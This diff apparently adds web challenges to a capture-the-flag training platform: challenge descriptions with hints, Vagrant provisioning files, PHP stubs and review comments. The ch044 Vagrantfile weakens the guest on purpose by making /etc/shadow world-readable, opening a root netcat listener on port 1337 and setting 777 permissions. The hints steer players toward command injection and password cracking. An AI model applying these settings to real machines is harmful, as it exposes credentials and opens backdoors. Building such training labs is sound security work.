+
+
+
+
+
diff --git a/challenges/ch041/newchallenge1.xml b/challenges/ch041/newchallenge1.xml
new file mode 100755
index 00000000..876bae82
--- /dev/null
+++ b/challenges/ch041/newchallenge1.xml
@@ -0,0 +1,20 @@
+
+
+ New Challenge 1
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.
+ ]]>
+Hints and tips :
+First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here's one : "Images can reveal way too much". All the Best, don't lose hope !!
reference_1
+
+
+
diff --git a/challenges/ch041/pwd2.php b/challenges/ch041/pwd2.php
new file mode 100755
index 00000000..82b756dd
--- /dev/null
+++ b/challenges/ch041/pwd2.php
@@ -0,0 +1,34 @@
+
+
+
+
+
+DeskTest : Funrally Axis Cube Black Base
+
+
+
+
Congratulations :D
You NAILED IT !";
+
+ die();
+ }
+
+ else
+ {
+
+ echo "
+
+
diff --git a/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png b/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png
new file mode 100755
index 00000000..25423b60
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png differ
diff --git a/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png b/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png
new file mode 100755
index 00000000..51f91746
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png differ
diff --git a/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png b/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png
new file mode 100755
index 00000000..bb81ab4c
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png differ
diff --git a/challenges/ch042/inside/newicons/1421021091_map-128.png b/challenges/ch042/inside/newicons/1421021091_map-128.png
new file mode 100755
index 00000000..1d47948e
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421021091_map-128.png differ
diff --git a/challenges/ch042/inside/newicons/fb24_1.png b/challenges/ch042/inside/newicons/fb24_1.png
new file mode 100755
index 00000000..7a61b287
Binary files /dev/null and b/challenges/ch042/inside/newicons/fb24_1.png differ
diff --git a/challenges/ch042/inside/newicons/fb24_2.png b/challenges/ch042/inside/newicons/fb24_2.png
new file mode 100755
index 00000000..128d9a0f
Binary files /dev/null and b/challenges/ch042/inside/newicons/fb24_2.png differ
diff --git a/challenges/ch042/inside/newicons/gmail32.png b/challenges/ch042/inside/newicons/gmail32.png
new file mode 100755
index 00000000..fd70437e
Binary files /dev/null and b/challenges/ch042/inside/newicons/gmail32.png differ
diff --git a/challenges/ch042/inside/newicons/google24_2.png b/challenges/ch042/inside/newicons/google24_2.png
new file mode 100755
index 00000000..7b868772
Binary files /dev/null and b/challenges/ch042/inside/newicons/google24_2.png differ
diff --git a/challenges/ch042/inside/newicons/instagram.png b/challenges/ch042/inside/newicons/instagram.png
new file mode 100755
index 00000000..68bb1a39
Binary files /dev/null and b/challenges/ch042/inside/newicons/instagram.png differ
diff --git a/challenges/ch042/inside/newicons/linkedin24_2.png b/challenges/ch042/inside/newicons/linkedin24_2.png
new file mode 100755
index 00000000..4dc9c022
Binary files /dev/null and b/challenges/ch042/inside/newicons/linkedin24_2.png differ
diff --git a/challenges/ch042/inside/newicons/linkedin32.png b/challenges/ch042/inside/newicons/linkedin32.png
new file mode 100755
index 00000000..ea15de25
Binary files /dev/null and b/challenges/ch042/inside/newicons/linkedin32.png differ
diff --git a/challenges/ch042/inside/newicons/mail24_1.png b/challenges/ch042/inside/newicons/mail24_1.png
new file mode 100755
index 00000000..66ec95c5
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail24_1.png differ
diff --git a/challenges/ch042/inside/newicons/mail24_2.png b/challenges/ch042/inside/newicons/mail24_2.png
new file mode 100755
index 00000000..c59cac41
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail24_2.png differ
diff --git a/challenges/ch042/inside/newicons/mail64_1.png b/challenges/ch042/inside/newicons/mail64_1.png
new file mode 100755
index 00000000..d94a3416
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail64_1.png differ
diff --git a/challenges/ch042/inside/newicons/place24.png b/challenges/ch042/inside/newicons/place24.png
new file mode 100755
index 00000000..721525ed
Binary files /dev/null and b/challenges/ch042/inside/newicons/place24.png differ
diff --git a/challenges/ch042/inside/newicons/place32.png b/challenges/ch042/inside/newicons/place32.png
new file mode 100755
index 00000000..87b6dee6
Binary files /dev/null and b/challenges/ch042/inside/newicons/place32.png differ
diff --git a/challenges/ch042/inside/newicons/twit.png b/challenges/ch042/inside/newicons/twit.png
new file mode 100755
index 00000000..16b88d59
Binary files /dev/null and b/challenges/ch042/inside/newicons/twit.png differ
diff --git a/challenges/ch042/inside/newicons/twitter24_2.png b/challenges/ch042/inside/newicons/twitter24_2.png
new file mode 100755
index 00000000..57c3b201
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter24_2.png differ
diff --git a/challenges/ch042/inside/newicons/twitter32.png b/challenges/ch042/inside/newicons/twitter32.png
new file mode 100755
index 00000000..14fb00c1
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter32.png differ
diff --git a/challenges/ch042/inside/newicons/twitter32_1.png b/challenges/ch042/inside/newicons/twitter32_1.png
new file mode 100755
index 00000000..0d2778f6
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter32_1.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_1.png b/challenges/ch042/inside/use-icon/fb48_1.png
new file mode 100755
index 00000000..b6bc1b76
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_2.png b/challenges/ch042/inside/use-icon/fb48_2.png
new file mode 100755
index 00000000..1b0af134
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_3.png b/challenges/ch042/inside/use-icon/fb48_3.png
new file mode 100755
index 00000000..09694e85
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_4.png b/challenges/ch042/inside/use-icon/fb48_4.png
new file mode 100755
index 00000000..89526692
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/fb_32.png b/challenges/ch042/inside/use-icon/fb_32.png
new file mode 100755
index 00000000..4be62fb2
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb_32.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48.png b/challenges/ch042/inside/use-icon/gplus48.png
new file mode 100755
index 00000000..983f1afb
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_2.png b/challenges/ch042/inside/use-icon/gplus48_2.png
new file mode 100755
index 00000000..ee2a147c
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_3.png b/challenges/ch042/inside/use-icon/gplus48_3.png
new file mode 100755
index 00000000..9cc71349
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_4.png b/challenges/ch042/inside/use-icon/gplus48_4.png
new file mode 100755
index 00000000..549ae0ed
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_1.png b/challenges/ch042/inside/use-icon/linkedin48_1.png
new file mode 100755
index 00000000..7a8e11ac
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_2.png b/challenges/ch042/inside/use-icon/linkedin48_2.png
new file mode 100755
index 00000000..417514aa
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_3.png b/challenges/ch042/inside/use-icon/linkedin48_3.png
new file mode 100755
index 00000000..9a77eef9
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_4.png b/challenges/ch042/inside/use-icon/linkedin48_4.png
new file mode 100755
index 00000000..b35db457
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin_32.png b/challenges/ch042/inside/use-icon/linkedin_32.png
new file mode 100755
index 00000000..9c009a52
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin_32.png differ
diff --git a/challenges/ch042/inside/use-icon/mail32.png b/challenges/ch042/inside/use-icon/mail32.png
new file mode 100755
index 00000000..bf5a04fd
Binary files /dev/null and b/challenges/ch042/inside/use-icon/mail32.png differ
diff --git a/challenges/ch042/inside/use-icon/mail32_1.png b/challenges/ch042/inside/use-icon/mail32_1.png
new file mode 100755
index 00000000..e80e9b08
Binary files /dev/null and b/challenges/ch042/inside/use-icon/mail32_1.png differ
diff --git a/challenges/ch042/inside/use-icon/msg_1png b/challenges/ch042/inside/use-icon/msg_1png
new file mode 100755
index 00000000..c49221ad
Binary files /dev/null and b/challenges/ch042/inside/use-icon/msg_1png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_1.png b/challenges/ch042/inside/use-icon/twitter48_1.png
new file mode 100755
index 00000000..fa928111
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_2.png b/challenges/ch042/inside/use-icon/twitter48_2.png
new file mode 100755
index 00000000..2a560776
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_3.png b/challenges/ch042/inside/use-icon/twitter48_3.png
new file mode 100755
index 00000000..b8ab821d
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_4.png b/challenges/ch042/inside/use-icon/twitter48_4.png
new file mode 100755
index 00000000..0bc14d99
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter_32.png b/challenges/ch042/inside/use-icon/twitter_32.png
new file mode 100755
index 00000000..bbcc2cc2
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter_32.png differ
diff --git a/challenges/ch042/inside/use-icons/facebook.png b/challenges/ch042/inside/use-icons/facebook.png
new file mode 100755
index 00000000..5fb0213b
Binary files /dev/null and b/challenges/ch042/inside/use-icons/facebook.png differ
diff --git a/challenges/ch042/inside/use-icons/google.png b/challenges/ch042/inside/use-icons/google.png
new file mode 100755
index 00000000..2942c7ea
Binary files /dev/null and b/challenges/ch042/inside/use-icons/google.png differ
diff --git a/challenges/ch042/inside/use-icons/linkedin.png b/challenges/ch042/inside/use-icons/linkedin.png
new file mode 100755
index 00000000..ba6a753b
Binary files /dev/null and b/challenges/ch042/inside/use-icons/linkedin.png differ
diff --git a/challenges/ch042/inside/use-icons/submit.png b/challenges/ch042/inside/use-icons/submit.png
new file mode 100755
index 00000000..7e35d6d5
Binary files /dev/null and b/challenges/ch042/inside/use-icons/submit.png differ
diff --git a/challenges/ch042/inside/use-icons/submit_check.png b/challenges/ch042/inside/use-icons/submit_check.png
new file mode 100755
index 00000000..d8da4735
Binary files /dev/null and b/challenges/ch042/inside/use-icons/submit_check.png differ
diff --git a/challenges/ch042/inside/use-icons/twitter.png b/challenges/ch042/inside/use-icons/twitter.png
new file mode 100755
index 00000000..9b81a0d6
Binary files /dev/null and b/challenges/ch042/inside/use-icons/twitter.png differ
diff --git a/challenges/ch042/newchallenge2.xml b/challenges/ch042/newchallenge2.xml
new file mode 100755
index 00000000..07bb83cc
--- /dev/null
+++ b/challenges/ch042/newchallenge2.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 2
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, they have solved this to an extent and have MITM'd a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn't enough to get to the user's profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.
+
+Hints and Tips :
+You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup'd. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You're LOGGED in (atleast as a user). Here's another : Wanna have a Cookie ??
+
+
diff --git a/challenges/ch042/setup_db/sql-connect.php b/challenges/ch042/setup_db/sql-connect.php
new file mode 100755
index 00000000..33b15d2c
--- /dev/null
+++ b/challenges/ch042/setup_db/sql-connect.php
@@ -0,0 +1,19 @@
+
+
+
+
+
+
diff --git a/challenges/ch043/Vagrantfile b/challenges/ch043/Vagrantfile
new file mode 100755
index 00000000..3eef6ac9
--- /dev/null
+++ b/challenges/ch043/Vagrantfile
@@ -0,0 +1,91 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ config.vm.provision "shell",
+ inline: "sudo php /var/www/html/setup_db/setup-db.php"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+ #print "almost done\n";
+ #config.vm.provision "shell",
+ # inline: "sudo php /var/www/html/sql-connections/setup-db.php"
+ #config.vm.provision "shell",
+ # inline: "sudo service apache2 restart && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
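Review bot: The `config.vm.network "forwarded_port", guest: 80, host: 8008` line publishes this deliberately vulnerable web app on the host without a bind address; Vagrant's documented default when `host_ip` is omitted is to listen on every host interface, so the challenge is reachable from the host's network and not only from the host itself. Binding to loopback keeps it local: `config.vm.network "forwarded_port", guest: 80, host: 8008, host_ip: "127.0.0.1"`. The template comment just above still says "localhost:8080" and should read 8008. The same mapping appears in the ch044 and ch045 Vagrantfiles in this commit, and all three also run `chmod -R 777 /var/www/html` and use `waratek/kali-mini` with no `config.vm.box_version` pin, so the base image can change between builds.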
diff --git a/challenges/ch043/images/back.jpg b/challenges/ch043/images/back.jpg
new file mode 100755
index 00000000..f8d1922f
Binary files /dev/null and b/challenges/ch043/images/back.jpg differ
diff --git a/challenges/ch043/images/back1.jpg b/challenges/ch043/images/back1.jpg
new file mode 100755
index 00000000..bcef5dc6
Binary files /dev/null and b/challenges/ch043/images/back1.jpg differ
diff --git a/challenges/ch043/images/happy.jpg b/challenges/ch043/images/happy.jpg
new file mode 100755
index 00000000..6067ec95
Binary files /dev/null and b/challenges/ch043/images/happy.jpg differ
diff --git a/challenges/ch043/images/images.jpeg b/challenges/ch043/images/images.jpeg
new file mode 100755
index 00000000..41a0560f
Binary files /dev/null and b/challenges/ch043/images/images.jpeg differ
diff --git a/challenges/ch043/images/sad.jpg b/challenges/ch043/images/sad.jpg
new file mode 100755
index 00000000..3f4b0183
Binary files /dev/null and b/challenges/ch043/images/sad.jpg differ
diff --git a/challenges/ch043/images/wow.jpg b/challenges/ch043/images/wow.jpg
new file mode 100755
index 00000000..bd73a084
Binary files /dev/null and b/challenges/ch043/images/wow.jpg differ
diff --git a/challenges/ch043/index.php b/challenges/ch043/index.php
new file mode 100755
index 00000000..523fc245
--- /dev/null
+++ b/challenges/ch043/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch043/inside/just_admin.php b/challenges/ch043/inside/just_admin.php
new file mode 100755
index 00000000..03ff6c5a
--- /dev/null
+++ b/challenges/ch043/inside/just_admin.php
@@ -0,0 +1,97 @@
+
+
+
+
+JUST GO
+
+
+
diff --git a/challenges/ch043/newchallenge3.xml b/challenges/ch043/newchallenge3.xml
new file mode 100755
index 00000000..adb51b1c
--- /dev/null
+++ b/challenges/ch043/newchallenge3.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn't even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
Hint : You're Logged in
+
+Hints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. reference1reference2
+
+
diff --git a/challenges/ch043/setup_db/sql-connect.php b/challenges/ch043/setup_db/sql-connect.php
new file mode 100755
index 00000000..0bd8ba15
--- /dev/null
+++ b/challenges/ch043/setup_db/sql-connect.php
@@ -0,0 +1,19 @@
+
+
+
+
+
+
diff --git a/challenges/ch044/Vagrantfile b/challenges/ch044/Vagrantfile
new file mode 100755
index 00000000..69eecce2
--- /dev/null
+++ b/challenges/ch044/Vagrantfile
@@ -0,0 +1,92 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo apt-get install whatweb -y"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod 644 /etc/shadow"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql start"
+ config.vm.provision "shell",
+ inline: "sudo nc -l 1337 &"
+ # config.vm.provision "shell",
+ # inline: "sudo chmod 555 /var/www/html/inside/.log_in.php"
+ config.vm.provision "shell",
+ inline: "chmod 111 /var/www/html/inside/.log\\'in.php"
+ # inline: "chmod 111 .log\'in.php"
+
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
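Review bot: The provisioners `sudo chmod 644 /etc/shadow` and `sudo nc -l 1337 &` weaken the guest on purpose for the challenge, but nothing in the file says so, which makes them read as mistakes to the next maintainer; a comment such as `# Deliberate challenge setup: /etc/shadow is world-readable and a root listener is opened on port 1337` would record the intent. The listener is also fragile: shell provisioners run only on the first `vagrant up` or an explicit `vagrant provision`, so after a reload nothing listens on 1337, and a job backgrounded with `&` may not outlive the provisioning session at all; this is worth confirming, or the listener can be started from a `run: "always"` provisioner. `chmod 111 /var/www/html/inside/.log\\'in.php` targets a file under the `/vagrant` synced folder, where mode changes may not take effect depending on the synced-folder type, so the permission step the challenge text relies on should be checked on the real provider. `apt-get install whatweb -y` runs without a prior `apt-get update`, which can fail on a stale package index.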
diff --git a/challenges/ch044/index.php b/challenges/ch044/index.php
new file mode 100755
index 00000000..8413b845
--- /dev/null
+++ b/challenges/ch044/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch044/inside/.log'in.php b/challenges/ch044/inside/.log'in.php
new file mode 100755
index 00000000..c8b4281e
--- /dev/null
+++ b/challenges/ch044/inside/.log'in.php
@@ -0,0 +1,79 @@
+
+
+
+
+
+
+
+
+Shell
+
+
+
+
Software: Apache/2.2.11 (Unix). PHP/4.4.9
uname -a: Linux trytohack 2.6.9-1.667smp #1 SMP Tue Nov 2 14:59:52 EST 2004 i686
Disabled functions: NONE
cURL: OFFRegister globals: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
+WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
";
+ //echo $html;
+}
+
+?>
diff --git a/challenges/ch044/inside/l7s.png b/challenges/ch044/inside/l7s.png
new file mode 100755
index 00000000..776b58d1
Binary files /dev/null and b/challenges/ch044/inside/l7s.png differ
diff --git a/challenges/ch044/inside/watt.jpg b/challenges/ch044/inside/watt.jpg
new file mode 100755
index 00000000..dc41e38d
Binary files /dev/null and b/challenges/ch044/inside/watt.jpg differ
diff --git a/challenges/ch044/inside/watweb.jpg b/challenges/ch044/inside/watweb.jpg
new file mode 100755
index 00000000..18b61658
Binary files /dev/null and b/challenges/ch044/inside/watweb.jpg differ
diff --git a/challenges/ch044/inside/whatweb-heading.jpg b/challenges/ch044/inside/whatweb-heading.jpg
new file mode 100755
index 00000000..43b1cfb6
Binary files /dev/null and b/challenges/ch044/inside/whatweb-heading.jpg differ
diff --git a/challenges/ch044/inside/whatweb.css b/challenges/ch044/inside/whatweb.css
new file mode 100755
index 00000000..2138e56d
--- /dev/null
+++ b/challenges/ch044/inside/whatweb.css
@@ -0,0 +1,116 @@
+* {
+ margin:0;
+ padding: 0;
+}
+html,body {
+ font: 1em "arial", "sans-serif";
+ background-color:#eeeeee;
+}
+h1,h2,h3 {
+ background-color:#fefefe;
+ padding-left: 20px;
+ border:1px solid #cccccc;
+ font-size:0.8em;
+ text-align:left;
+ font-weight:none;
+}
+p, blockquote {
+ margin:15px;
+ font-size: 0.8em;
+ padding:15px;
+}
+ul {
+ margin:15px;
+ padding:15px;
+ list-style-type: none;
+ text-align:left;
+}
+input {
+ border:1px solid #cccccc;
+}
+input:hover {
+ background-color:#eeeeee;
+}
+a:link {
+ color:#2580a2;
+}
+a:active, a:visited {
+ color: #2580a2;
+}
+a:hover {
+ color: #f90;
+}
+img {
+ border:0;
+}
+#loading_img {
+ position:relative;
+ display:block;
+ visibility:hidden;
+ width:16px;
+ height:16px;
+ border:0;
+}
+#form {
+ float: right;
+ padding:15px;
+ margin:15px;
+ width: 40%;
+ overflow: auto;
+}
+#description {
+ float: left;
+ width: 40%;
+ overflow: auto;
+}
+#whatweb {
+ text-align: left;
+ display:block;
+ display:none;
+ font-size:medium;
+ padding:15px;
+ margin:15px;
+ width:970px;
+ border:1px solid #dddddd;
+ overflow: auto;
+}
+#whatweb:hover {
+ background-color:#fefefe;
+}
+#footer {
+ background-color:#eeeeee;
+ border:1px solid #cccccc;
+ margin: 0px auto -1px auto;
+ height:10px;
+ text-align:center;
+ font-size:0.7em;
+}
+#footer:hover {
+ background-color:#fefefe;
+}
+#container {
+ background-color:#ffffff;
+ border:1px solid #cccccc;
+ margin: 0px auto -1px auto;
+ width:730px;
+ height:600px;
+ text-align:left;
+}
+#header {
+ background-color:#eeeeee;
+ margin: 0px auto -1px auto;
+ width:730px;
+ height:160px;
+ text-align:center;
+}
+.smalltext {
+ font-size:0.7em;
+}
+.icon {
+ height: 32px;
+ width: 32px;
+ float: left;
+ margin: 0;
+ padding: 0;
+ margin-right: 30px;
+}
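Review bot: In the `h1,h2,h3` rule, `font-weight:none;` is not a valid value and browsers will drop the declaration; `font-weight:normal;` is presumably what was meant. In `#whatweb`, `display:block;` is immediately followed by `display:none;`, so the first declaration is dead and can be removed. If this stylesheet was copied from an upstream project, a header comment naming the origin would help whoever has to update it later.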
diff --git a/challenges/ch044/inside/wiki.png b/challenges/ch044/inside/wiki.png
new file mode 100755
index 00000000..af3b5627
Binary files /dev/null and b/challenges/ch044/inside/wiki.png differ
diff --git a/challenges/ch044/newchallenge4.xml b/challenges/ch044/newchallenge4.xml
new file mode 100755
index 00000000..e499ecc1
--- /dev/null
+++ b/challenges/ch044/newchallenge4.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ blacklist there is a very-minute mistake which all lead to this attack, crack that to get into the web-server and to get sudo credentials of hacker's system which is as defined : "login page" [the hacker's sudo page] is somewhere hidden on the main webpage, this trick works quite sometimes but is a bad habit for web-developers hiding a link. The hacker being assaulted gives hint for his system's su password, "you'll get the login crendentials with the services and port of the backdoor, username is "root" and password is the concatenation of these three words [the hackers speak for the corresponding port number] + [the service running] + [sudo password from the etc/passwd file, shadow crack]". Now, it's time for you to work on, All the Best !
+
+Hints /Tips & Rules :
+You are not allowed to view the source-code of php files (using cat or some other services) , after getting into the web-server system [to kinda make this more challenging]. First check out how the website works by varying different inputs, next go through the blacklist file which with some modifications would allow you to execute commands on the web-server system. You might have to change permissions of files. reference1
+]]>
+
+
+
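Review bot: The title line reads "New Challenge 3", the same title that `challenges/ch043/newchallenge3.xml` carries, so two challenges will be listed under one name; this file presumably wants `New Challenge 4`. The description also misspells "crendentials", which should be "credentials".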
diff --git a/challenges/ch045/Vagrantfile b/challenges/ch045/Vagrantfile
new file mode 100755
index 00000000..dc398a54
--- /dev/null
+++ b/challenges/ch045/Vagrantfile
